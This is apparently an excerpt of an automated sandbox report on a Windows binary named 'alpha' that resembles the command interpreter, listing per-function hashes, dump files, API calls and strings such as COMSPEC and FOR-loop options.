                                                                                          • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                          • Instruction ID: 2b5cc85fcd3459605485be03ade3b720bdfcbd23ed7fc71a2e120c4f08da3648
                                                                                          • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                          • Instruction Fuzzy Hash: 0311E931B0A74791EB54CB65E1442B912A0BF89BE4F184335DE6ECB3D6DE3CD480A300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memsetwcschr
                                                                                          • String ID: 2$COMSPEC
                                                                                          • API String ID: 1764819092-1738800741
                                                                                          • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                          • Instruction ID: 7ed1a9f6bfa0e649fccef473a754143f2ea7bf535b9cc905f3fbb0799120d66a
                                                                                          • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                          • Instruction Fuzzy Hash: 8D516A32F0A64BA5FB789B25A8413B92295FF85B84F084036DA4DC67D7DF2CE844A741
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                          • String ID:
                                                                                          • API String ID: 4254246844-0
                                                                                          • Opcode ID: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                                                          • Instruction ID: 219f492d9f4d3db341910247ff5263064da078a242de427b056eb6b59c452005
                                                                                          • Opcode Fuzzy Hash: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                                                          • Instruction Fuzzy Hash: 9741CE32B0A783A6EE208B10E85437967A0FF99B94F548534DA4EC77D1EF3CE449A740
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$EnvironmentFreeProcessVariable
                                                                                          • String ID:
                                                                                          • API String ID: 2643372051-0
                                                                                          • Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                                          • Instruction ID: cd9eae14e4b87f3078b27132b39d6aef660c09a144b836c64922bd03a0988769
                                                                                          • Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                                          • Instruction Fuzzy Hash: AFF0F9B2A1BB83A1EB109B75F404075AAE1FF8E7A1B55D270D52E833D0DE3C94449200
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _get_osfhandle$ConsoleMode
                                                                                          • String ID:
                                                                                          • API String ID: 1591002910-0
                                                                                          • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                          • Instruction ID: 789c18de12357a51703056f8eb462a67878a1af29206af5288450d46688aac36
                                                                                          • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                          • Instruction Fuzzy Hash: 59F07A34A0B783EBE6148B20E865078BBB0FB8E722F558174D90E87331DF7CA4059B00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: DriveType
                                                                                          • String ID: :
                                                                                          • API String ID: 338552980-336475711
                                                                                          • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                          • Instruction ID: 10c3e276709585b532891a5257c16b276d064a047a1e428d704e57ce42a55034
                                                                                          • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                          • Instruction Fuzzy Hash: 23E06D7661964186E7209B60E4910AAB7B1FB8D349F941525EA8DC3724DF3CD249CB08
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E7CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDA6
                                                                                            • Part of subcall function 00007FF6A0E7CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDBD
                                                                                          • GetConsoleTitleW.KERNELBASE ref: 00007FF6A0E85B52
                                                                                            • Part of subcall function 00007FF6A0E84224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6A0E84297
                                                                                            • Part of subcall function 00007FF6A0E84224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6A0E842D7
                                                                                            • Part of subcall function 00007FF6A0E84224: memset.MSVCRT ref: 00007FF6A0E842FD
                                                                                            • Part of subcall function 00007FF6A0E84224: memset.MSVCRT ref: 00007FF6A0E84368
                                                                                            • Part of subcall function 00007FF6A0E84224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6A0E84380
                                                                                            • Part of subcall function 00007FF6A0E84224: wcsrchr.MSVCRT ref: 00007FF6A0E843E6
                                                                                            • Part of subcall function 00007FF6A0E84224: lstrcmpW.KERNELBASE ref: 00007FF6A0E84401
                                                                                          • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF6A0E85BC7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                          • String ID:
                                                                                          • API String ID: 497088868-0
                                                                                          • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                          • Instruction ID: a8c44aec8ea05b04e96e2024b8d3491570abd9875239abdf5d767c39466e4258
                                                                                          • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                          • Instruction Fuzzy Hash: D531E631F0E78366FA24EB21A4901BDA295FF89BC0F545435E94EC7B96DE3CE506A700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Concurrency::cancel_current_taskmalloc
                                                                                          • String ID:
                                                                                          • API String ID: 1412018758-0
                                                                                          • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                          • Instruction ID: 09860122d362fea8b796f8be254fdb9b3d35f5cb3d2fe6d8a396ba1c9d330b46
                                                                                          • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                          • Instruction Fuzzy Hash: 4DE01261F5B707B6FE182B62684117812547F5D741F5C1470DD1D85382FE2CA4A9A310
                                                                                          APIs
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDA6
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDBD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocProcess
                                                                                          • String ID:
                                                                                          • API String ID: 1617791916-0
                                                                                          • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                          • Instruction ID: ae6706625a2695a46215ad74246964e1af96132dc94ca0402fa9ed17e386f87d
                                                                                          • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                          • Instruction Fuzzy Hash: CAF08132E1AB4392EB548B15F840178B7A0FB8AB00B589035D90E83355CF3CE485D700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: exit
                                                                                          • String ID:
                                                                                          • API String ID: 2483651598-0
                                                                                          • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                          • Instruction ID: a5faabaf9eb885b14219be0b802b51cd4044051a8ec45e5ae1fcbda3fcf4e747
                                                                                          • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                          • Instruction Fuzzy Hash: 10C08C70B0A647ABFB2C6B71289103D99E9BF4D302F05683CCA0BC1382EE2CD80C9200
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: DefaultUser
                                                                                          • String ID:
                                                                                          • API String ID: 3358694519-0
                                                                                          • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                          • Instruction ID: 05a93d95d120a1b8f572d343fdd5040c973b049c9a3fe1b9f0d18eb7b4895aea
                                                                                          • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                          • Instruction Fuzzy Hash: 44E02BF3D0A253ABF5582F4160413F41953FB7A783FC44031D70D817C04D2D28457208
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset
                                                                                          • String ID:
                                                                                          • API String ID: 2221118986-0
                                                                                          • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                          • Instruction ID: 5de4b03ae947725fb72120dae8bd24d2aabe88b2246520cbd8cfe5316431820a
                                                                                          • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                          • Instruction Fuzzy Hash: FDF0E231B0A78351FA408B56B9401296290AF88BF0F088334EF7D87BC9EE3CD4528300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
                                                                                          • String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
                                                                                          • API String ID: 1388555566-2647954630
                                                                                          • Opcode ID: dd5574a000e659851fdbf238c5bb4c561f059835a701a2d9c9248c4e2a7a7e86
                                                                                          • Instruction ID: a0e178cccd3a4c68cf411362bd5ff825c93fa5139267cbb441382297e36ae18e
                                                                                          • Opcode Fuzzy Hash: dd5574a000e659851fdbf238c5bb4c561f059835a701a2d9c9248c4e2a7a7e86
                                                                                          • Instruction Fuzzy Hash: A0A2B672E0AB83A6EB148B35E4142B9BBA1FF89785F548135DA0E87795DF3CE444E700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
                                                                                          • String ID: &<|>$+: $:$:EOF$=,;$^
                                                                                          • API String ID: 511550188-726566285
                                                                                          • Opcode ID: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                                                                          • Instruction ID: 3b8722ec53b3773bb7eb41ee933917ee8dd083b2390ff1c482d3a5772aa59159
                                                                                          • Opcode Fuzzy Hash: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                                                                          • Instruction Fuzzy Hash: D152C532E0E693A6FB648B24A410279ABE1FB8E745F548135DA4EC3795DF3CE845E700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsnicmp$wcschr$wcstol
                                                                                          • String ID: delims=$eol=$skip=$tokens=$useback$usebackq
                                                                                          • API String ID: 1738779099-3004636944
                                                                                          • Opcode ID: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                                                                          • Instruction ID: ffade8c607eda87d578697be41462cdc5c260c69e76e82497da86d22e8d70204
                                                                                          • Opcode Fuzzy Hash: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                                                                          • Instruction Fuzzy Hash: 1A729E32F0A643AAEB248F65D4447BD37B1FB84788F488135DE0D97795EE3CA825A300
                                                                                          APIs
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E97F44
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E97F5C
                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E97F9E
                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E97FFF
                                                                                          • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98020
                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98036
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98061
                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF6A0E98075
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E980D6
                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF6A0E980EA
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E98177
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E9819A
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E981BD
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E981DC
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E981FB
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E9821A
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E98239
                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98291
                                                                                          • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E982D7
                                                                                          • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E982FB
                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E9831A
